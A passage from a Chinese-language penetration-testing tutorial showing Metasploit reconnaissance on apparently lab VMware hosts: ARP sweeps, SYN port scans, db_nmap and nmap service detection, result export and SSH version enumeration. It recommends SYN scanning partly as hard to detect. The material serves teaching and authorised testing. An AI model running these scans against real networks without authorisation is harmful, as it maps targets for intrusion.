   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.33.6.0/24
rhosts => 192.33.6.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 50
threads => 50
msf5 auxiliary(scanner/discovery/arp_sweep) > set timeout 2
timeout => 2
msf5 auxiliary(scanner/discovery/arp_sweep) > show options 

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS     192.33.6.0/24    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    50               yes       The number of concurrent threads (max one per host)
   TIMEOUT    2                yes       The number of seconds to wait for new data

msf5 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.33.6.1 appears to be up (VMware, Inc.).
[+] 192.33.6.2 appears to be up (VMware, Inc.).
[+] 192.33.6.151 appears to be up (VMware, Inc.).
[+] 192.33.6.200 appears to be up (VMware, Inc.).
[+] 192.33.6.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/discovery/arp_sweep) >

除了使用内置的辅助模块也可以通过控制台调用系统工具netdiscover来探测主机

msf5 auxiliary(scanner/discovery/arp_sweep) > netdiscover -r 192.33.6.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts   
 18 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 1080   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.33.6.1      00:50:56:c0:00:08      1      60  VMware, Inc. 
 192.33.6.2      00:50:56:f0:2a:96      5     300  VMware, Inc. 
 192.33.6.151    00:0c:29:fb:6f:2e      5     300  VMware, Inc. 
 192.33.6.200    00:0c:29:8c:0f:dd      6     360  VMware, Inc. 
 192.33.6.254    00:50:56:e3:b4:52      1      60  VMware, Inc.

PS:针对内置辅助模块和系统工具扫描结果来看,后者多了一个发现主机的MAC地址信息。当然这里也可以使用Nmap来进行探测存活主机情况。

端口扫描

Metasploit 的辅助模块中提供了几款实用的端口扫描器。

use auxiliary/scanner/portscan/ack        
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/ftpbounce  
use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/syn

一般情况下推荐使用 syn 端口扫描器,因为他的扫描速度较快,结果比较准确且不易被对方察觉。

msf5 auxiliary(scanner/discovery/arp_sweep) > back
msf5 > use auxiliary/scanner/portscan/syn 
msf5 auxiliary(scanner/portscan/syn) > show options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.33.6.151
rhosts => 192.33.6.151
msf5 auxiliary(scanner/portscan/syn) > set ports 1-65535
ports => 1-65535
msf5 auxiliary(scanner/portscan/syn) > set threads 50
threads => 50
msf5 auxiliary(scanner/portscan/syn) > show options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-65535          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.33.6.151     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    50               yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/syn) > run
[+]  TCP OPEN 192.33.6.151:135
[+]  TCP OPEN 192.33.6.151:139
[+]  TCP OPEN 192.33.6.151:445
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/portscan/syn) >

探测服务详细信息

  • 调用执行MSF封装集成的Nmap

Nmap能够很好地与Metasploit渗透测试数据库集成在一起,可以方便地在Metasploit终端中使用db_nmap,该命令是Nmap的一个封装,与Nmap使用方法完全一致,不同的是其执行结果将自动输人到数据库中,所以要使用db_nmap前提需要已连接上postgresql数据库

msf5 > db_status 
[*] Connected to msf. Connection type: postgresql.
msf5 >

查看db_nmap命令帮助信息

msf5 > db_nmap -h
[*] Nmap 7.80 ( https://nmap.org )
[*] Usage: nmap [Scan Type(s)] [Options] {target specification}
[*] TARGET SPECIFICATION:
[*] Can pass hostnames, IP addresses, networks, etc.
[*] Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
[*] -iL <inputfilename>: Input from list of hosts/networks
[*] -iR <num hosts>: Choose random targets
[*] --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
[*] --excludefile <exclude_file>: Exclude list from file
[*] HOST DISCOVERY:
[*] -sL: List Scan - simply list targets to scan
[*] -sn: Ping Scan - disable port scan
[*] -Pn: Treat all hosts as online -- skip host discovery
[*] -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
[*] -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
[*] -PO[protocol list]: IP Protocol Ping
[*] -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
[*] --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
[*] --system-dns: Use OS's DNS resolver
[*] --traceroute: Trace hop path to each host
[*] SCAN TECHNIQUES:
[*] -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
[*] -sU: UDP Scan
[*] -sN/sF/sX: TCP Null, FIN, and Xmas scans
[*] --scanflags <flags>: Customize TCP scan flags
[*] -sI <zombie host[:probeport]>: Idle scan
[*] -sY/sZ: SCTP INIT/COOKIE-ECHO scans
[*] -sO: IP protocol scan
[*] -b <FTP relay host>: FTP bounce scan
[*] PORT SPECIFICATION AND SCAN ORDER:
[*] -p <port ranges>: Only scan specified ports
[*] Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
[*] --exclude-ports <port ranges>: Exclude the specified ports from scanning
[*] -F: Fast mode - Scan fewer ports than the default scan
[*] -r: Scan ports consecutively - don't randomize
[*] --top-ports <number>: Scan <number> most common ports
[*] --port-ratio <ratio>: Scan ports more common than <ratio>
[*] SERVICE/VERSION DETECTION:
[*] -sV: Probe open ports to determine service/version info
[*] --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
[*] --version-light: Limit to most likely probes (intensity 2)
[*] --version-all: Try every single probe (intensity 9)
[*] --version-trace: Show detailed version scan activity (for debugging)
[*] SCRIPT SCAN:
[*] -sC: equivalent to --script=default
[*] --script=<Lua scripts>: <Lua scripts> is a comma separated list of
[*] directories, script-files or script-categories
[*] --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
[*] --script-args-file=filename: provide NSE script args in a file
[*] --script-trace: Show all data sent and received
[*] --script-updatedb: Update the script database.
[*] --script-help=<Lua scripts>: Show help about scripts.
[*] <Lua scripts> is a comma-separated list of script-files or
[*] script-categories.
[*] OS DETECTION:
[*] -O: Enable OS detection
[*] --osscan-limit: Limit OS detection to promising targets
[*] --osscan-guess: Guess OS more aggressively
[*] TIMING AND PERFORMANCE:
[*] Options which take <time> are in seconds, or append 'ms' (milliseconds),
[*] 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
[*] -T<0-5>: Set timing template (higher is faster)
[*] --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
[*] --min-parallelism/max-parallelism <numprobes>: Probe parallelization
[*] --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
[*] probe round trip time.
[*] --max-retries <tries>: Caps number of port scan probe retransmissions.
[*] --host-timeout <time>: Give up on target after this long
[*] --scan-delay/--max-scan-delay <time>: Adjust delay between probes
[*] --min-rate <number>: Send packets no slower than <number> per second
[*] --max-rate <number>: Send packets no faster than <number> per second
[*] FIREWALL/IDS EVASION AND SPOOFING:
[*] -f; --mtu <val>: fragment packets (optionally w/given MTU)
[*] -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
[*] -S <IP_Address>: Spoof source address
[*] -e <iface>: Use specified interface
[*] -g/--source-port <portnum>: Use given port number
[*] --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies
[*] --data <hex string>: Append a custom payload to sent packets
[*] --data-string <string>: Append a custom ASCII string to sent packets
[*] --data-length <num>: Append random data to sent packets
[*] --ip-options <options>: Send packets with specified ip options
[*] --ttl <val>: Set IP time-to-live field
[*] --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
[*] --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
[*] OUTPUT:
[*] -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
[*] and Grepable format, respectively, to the given filename.
[*] -oA <basename>: Output in the three major formats at once
[*] -v: Increase verbosity level (use -vv or more for greater effect)
[*] -d: Increase debugging level (use -dd or more for greater effect)
[*] --reason: Display the reason a port is in a particular state
[*] --open: Only show open (or possibly open) ports
[*] --packet-trace: Show all packets sent and received
[*] --iflist: Print host interfaces and routes (for debugging)
[*] --append-output: Append to rather than clobber specified output files
[*] --resume <filename>: Resume an aborted scan
[*] --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
[*] --webxml: Reference stylesheet from Nmap.Org for more portable XML
[*] --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
[*] MISC:
[*] -6: Enable IPv6 scanning
[*] -A: Enable OS detection, version detection, script scanning, and traceroute
[*] --datadir <dirname>: Specify custom Nmap data file location
[*] --send-eth/--send-ip: Send using raw ethernet frames or IP packets
[*] --privileged: Assume that the user is fully privileged
[*] --unprivileged: Assume the user lacks raw socket privileges
[*] -V: Print version number
[*] -h: Print this help summary page.
[*] EXAMPLES:
[*] nmap -v -A scanme.nmap.org
[*] nmap -v -sn 192.168.0.0/16 10.0.0.0/8
[*] nmap -v -iR 10000 -Pn -p 80
[*] SEE THE MAN PAGE (https://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES
msf5 >

探测服务详细信息

msf5 > db_nmap -Pn -sV 192.33.6.151
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 04:25 EDT
[*] Nmap: Nmap scan report for 192.33.6.151
[*] Nmap: Host is up (0.00060s latency).
[*] Nmap: Not shown: 990 closed ports
[*] Nmap: PORT      STATE SERVICE        VERSION
[*] Nmap: 135/tcp   open  msrpc          Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds   Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp  open  ms-wbt-server?
[*] Nmap: 49152/tcp open  msrpc          Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc          Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc          Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc          Microsoft Windows RPC
[*] Nmap: 49156/tcp open  msrpc          Microsoft Windows RPC
[*] Nmap: 49157/tcp open  msrpc          Microsoft Windows RPC
[*] Nmap: MAC Address: 00:0C:29:FB:6F:2E (VMware)
[*] Nmap: Service Info: Host: WIN-5DTIE0M734E; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 87.94 seconds
msf5 >

将数据库中的扫描结果导出

msf5 > db_export -f xml 1
[*] Starting export of workspace default to 1 [ xml ]...
[*] Finished export of workspace default to 1 [ xml ]...
msf5 > ls
[*] exec: ls

1  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
msf5 >

查看导出文件内容

<?xml version="1.0" encoding="UTF-8"?>
<MetasploitV5>
<generated time="2020-06-24 08:29:14 UTC" user="qftm" project="default" product="framework"/>
<hosts>
  <host>
    <id>1</id>
    <created-at>2020-06-24 08:26:50 UTC</created-at>
    <address>192.33.6.151</address>
    <mac>00:0c:29:fb:6f:2e</mac>
    <comm></comm>
    <name/>
    <state>alive</state>
    <os-name>Unknown</os-name>
    <os-flavor/>
    <os-sp/>
    <os-lang/>
    <arch/>
    <workspace-id>1</workspace-id>
    <updated-at>2020-06-24 08:26:51 UTC</updated-at>
    <purpose>device</purpose>
    <info/>
    <comments/>
    <scope/>
    <virtual-host/>
    <note-count>0</note-count>
    <vuln-count>0</vuln-count>
    <service-count>10</service-count>
    <host-detail-count>0</host-detail-count>
    <exploit-attempt-count>0</exploit-attempt-count>
    <cred-count>0</cred-count>
    <detected-arch/>
    <os-family/>
    <host_details>
    </host_details>
    <exploit_attempts>
    </exploit_attempts>
    <services>
      <service>
      <id>1</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>135</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
      </service>
      <service>
      <id>2</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>139</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>netbios-ssn</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows netbios-ssn</info>
      </service>
      <service>
      <id>3</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>445</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>microsoft-ds</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP</info>
      </service>
      <service>
      <id>4</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>3389</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>ms-wbt-server</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info></info>
      </service>
      <service>
      <id>5</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49152</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
      </service>
      <service>
      <id>6</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49153</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
      </service>
      <service>
      <id>7</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49154</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
      </service>
      <service>
      <id>8</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49155</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
      </service>
      <service>
      <id>9</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:51 UTC</created-at>
      <port>49156</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:51 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
      </service>
      <service>
      <id>10</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:51 UTC</created-at>
      <port>49157</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:51 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
      </service>
    </services>
    <notes>
    </notes>
    <vulns>
    </vulns>
  </host>
</hosts>
<events>
  <event>
      <id>1</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:23:38 UTC</created-at>
      <name>ui_start</name>
      <updated-at>2020-06-24 08:23:38 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoNcmV2aXNpb24iDyRSZXZpc2lvbiQ=</info>
  </event>

  <event>
      <id>2</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:23:38 UTC</created-at>
      <name>ui_command</name>
      <updated-at>2020-06-24 08:23:38 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoMY29tbWFuZCILYmFubmVy</info>
  </event>

  <event>
      <id>3</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:23:42 UTC</created-at>
      <name>ui_command</name>
      <updated-at>2020-06-24 08:23:42 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoMY29tbWFuZCIOZGJfc3RhdHVz</info>
  </event>

  <event>
      <id>4</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:25:22 UTC</created-at>
      <name>ui_command</name>
      <updated-at>2020-06-24 08:25:22 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoMY29tbWFuZCIhZGJfbm1hcCAtUG4gLXNWIDE5Mi4zMy42LjE1MQ==</info>
  </event>

  <event>
      <id>5</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:27:27 UTC</created-at>
      <name>ui_command</name>
      <updated-at>2020-06-24 08:27:27 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoMY29tbWFuZCIKaG9zdHM=</info>
  </event>

  <event>
      <id>6</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:28:41 UTC</created-at>
      <name>ui_command</name>
      <updated-at>2020-06-24 08:28:41 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoMY29tbWFuZCIRZGJfZXhwb3J0IC1o</info>
  </event>

  <event>
      <id>7</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:29:03 UTC</created-at>
      <name>ui_command</name>
      <updated-at>2020-06-24 08:29:03 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoMY29tbWFuZCIbZGJfZXhwb3J0IC1mIHR4dCAxLnR4dA==</info>
  </event>

  <event>
      <id>8</id>
      <workspace-id>1</workspace-id>
      <host-id/>
      <created-at>2020-06-24 08:29:14 UTC</created-at>
      <name>ui_command</name>
      <updated-at>2020-06-24 08:29:14 UTC</updated-at>
      <critical/>
      <seen/>
      <username/>
      <info>BAh7BjoMY29tbWFuZCIXZGJfZXhwb3J0IC1mIHhtbCAx</info>
  </event>

</events>
<services>
  <service>
      <id>1</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>135</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
  </service>

  <service>
      <id>2</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>139</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>netbios-ssn</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows netbios-ssn</info>
  </service>

  <service>
      <id>3</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>445</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>microsoft-ds</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP</info>
  </service>

  <service>
      <id>4</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>3389</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>ms-wbt-server</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info></info>
  </service>

  <service>
      <id>5</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49152</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
  </service>

  <service>
      <id>6</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49153</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
  </service>

  <service>
      <id>7</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49154</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
  </service>

  <service>
      <id>8</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:50 UTC</created-at>
      <port>49155</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:50 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
  </service>

  <service>
      <id>9</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:51 UTC</created-at>
      <port>49156</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:51 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
  </service>

  <service>
      <id>10</id>
      <host-id>1</host-id>
      <created-at>2020-06-24 08:26:51 UTC</created-at>
      <port>49157</port>
      <proto>tcp</proto>
      <state>open</state>
      <name>msrpc</name>
      <updated-at>2020-06-24 08:26:51 UTC</updated-at>
      <info>Microsoft Windows RPC</info>
  </service>

</services>
<web_sites>
</web_sites>
<web_pages>
</web_pages>
<web_forms>
</web_forms>
<web_vulns>
</web_vulns>
<module_details>
</module_details>
</MetasploitV5>
  • 调用执行系统Nmap

在msf控制台中可以调用系统中的命令,比如可以使用 Nmap 探测目标的详细服务信息。

nmap -sV -p- 192.33.6.151
msf5 > nmap -sV -p- 192.33.6.151
[*] exec: nmap -sV -p- 192.33.6.151

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 22:19 EDT
Nmap scan report for 192.33.6.151
Host is up (0.00034s latency).
Not shown: 65525 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49157/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 00:0C:29:FB:6F:2E (VMware)
Service Info: Host: WIN-5DTIE0M734E; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.81 seconds
msf5 >

服务查点

很多网络服务是漏洞频发的高危对象,对网络上的特定服务进行扫描,往往能让我们少走弯路,增加渗透成功的几率。确定开放端口后,通常会对相应端口,上所运行服务的信息进行更深人的挖掘,通常称为服务查点。

在 Metasploit 的辅助模块中,有很多用于服务扫描和查点的工具,这些工具通常以

[service_name]_version

命名。该模块可用于遍历网络中包含某种服务的主机,并进一步确定服务的版本。

  • SSH 服务查点

SSH是类UNIX系统上最常见的远程管理服务,与Telnet 不同的是,它采用了安全的加密信息传输方式。通常管理员会使用SSH对服务器进行远程管理,服务器会向SSH客户端返回一个远程的Shell连接。如果没有做其他的安全增强配置(如限制管理登录的IP地址),只要获取服务器的登录口令,就可以使用SSH客户端登录服务器,那就相当于获得了相应登录用户的所有权限。

扫描网络中开放 SSH 服务的所有主机。

ssh_version
use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/ssh/ssh_version 
msf5 auxiliary(scanner/ssh/ssh_version) > info

       Name: SSH Version Scanner
     Module: auxiliary/scanner/ssh/ssh_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Daniel van Eeden <metasploit@myname.nl>

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    22               yes       The target port (TCP)
  THREADS  1                yes       The number of concurrent threads (max one per host)
  TIMEOUT  30               yes       Timeout for the SSH probe

Description:
  Detect SSH Version.

References:
  http://en.wikipedia.org/wiki/SecureShell

msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.33.6.0/24
rhosts => 192.33.6.0/24
msf5 auxiliary(scanner/ssh/ssh_version) > set threads 50
threads => 50
msf5 auxiliary(scanner/ssh/ssh_version) > set timeout 10
timeout => 10
msf5 auxiliary(scanner/ssh/ssh_version) > run

[*] 192.33.6.0/24:22      - Scanned  52 of 256 hosts (20% complete)
[*] 192.33.6.0/24:22      - Scanned  79 of 256 hosts (30% complete)
[*] 192.33.6.0/24:22      - Scanned 102 of 256 hosts (39% complete)
[+] 192.33.6.150:22       - SSH server version: SSH-2.0-OpenSSH_8.1p1 Debian-5 ( service.version=8.1p1 openssh.comment=Debian-5 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:8.1p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.33.6.0/24:22      - Scanned 117 of 256 hosts (45% complete)
[*] 192.33.6.0/24:22      - Scanned 138 of 256 hosts (53% complete)
[*] 192.33.6.0/24:22      - Scanned 178 of 256 hosts (69% complete)
[*] 192.33.6.0/24:22      - Scanned 194 of 256 hosts (75% complete)
[*] 192.33.6.0/24:22      - Scanned 222 of 256 hosts (86% complete)
[*] 192.33.6.0/24:22      - Scanned 231 of 256 hosts (90% complete)
[*] 192.33.6.0/24:22      - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_version) >

从结果看到,检测到主机192.33.6.150开放了22端口SSH服务

  • 其他服务查点

使用search进行特定搜索

msf5 > search type:auxiliary path:_version

Matching Modules
================

   #   Name                                                     Disclosure Date  Rank    Check  Description
   -   ----                                                     ---------------  ----    -----  -----------
   0   auxiliary/fuzzers/ssh/ssh_version_15                                      normal  No     SSH 1.5 Version Fuzzer
   1   auxiliary/fuzzers/ssh/ssh_version_2                                       normal  No     SSH 2.0 Version Fuzzer
   2   auxiliary/fuzzers/ssh/ssh_version_corrupt                                 normal  No     SSH Version Corruption
   3   auxiliary/gather/ibm_sametime_version                    2013-12-27       normal  No     IBM Lotus Sametime Version Enumeration
   4   auxiliary/scanner/db2/db2_version                                         normal  No     DB2 Probe Utility
   5   auxiliary/scanner/ftp/ftp_version                                         normal  No     FTP Version Scanner
   6   auxiliary/scanner/h323/h323_version                                       normal  No     H.323 Version Scanner
   7   auxiliary/scanner/http/coldfusion_version                                 normal  No     ColdFusion Version Scanner
   8   auxiliary/scanner/http/docker_version                                     normal  No     Docker Server Version Scanner
   9   auxiliary/scanner/http/http_version                                       normal  No     HTTP Version Detection
   10  auxiliary/scanner/http/joomla_version                                     normal  No     Joomla Version Scanner
   11  auxiliary/scanner/http/sap_businessobjects_version_enum                   normal  No     SAP BusinessObjects Version Detection
   12  auxiliary/scanner/http/ssl_version                       2014-10-14       normal  No     HTTP SSL/TLS Version Detection (POODLE scanner)
   13  auxiliary/scanner/imap/imap_version                                       normal  No     IMAP4 Banner Grabber
   14  auxiliary/scanner/ipmi/ipmi_version                                       normal  No     IPMI Information Discovery
   15  auxiliary/scanner/lotus/lotus_domino_version                              normal  No     Lotus Domino Version
   16  auxiliary/scanner/memcached/memcached_udp_version        2003-07-23       normal  No     Memcached UDP Version Scanner
   17  auxiliary/scanner/mysql/mysql_version                                     normal  No     MySQL Server Version Enumeration
   18  auxiliary/scanner/oracle/tnslsnr_version                 2009-01-07       normal  No     Oracle TNS Listener Service Version Query
   19  auxiliary/scanner/pop3/pop3_version                                       normal  No     POP3 Banner Grabber
   20  auxiliary/scanner/postgres/postgres_version                               normal  No     PostgreSQL Version Probe
   21  auxiliary/scanner/printer/printer_version_info                            normal  No     Printer Version Information Scanner
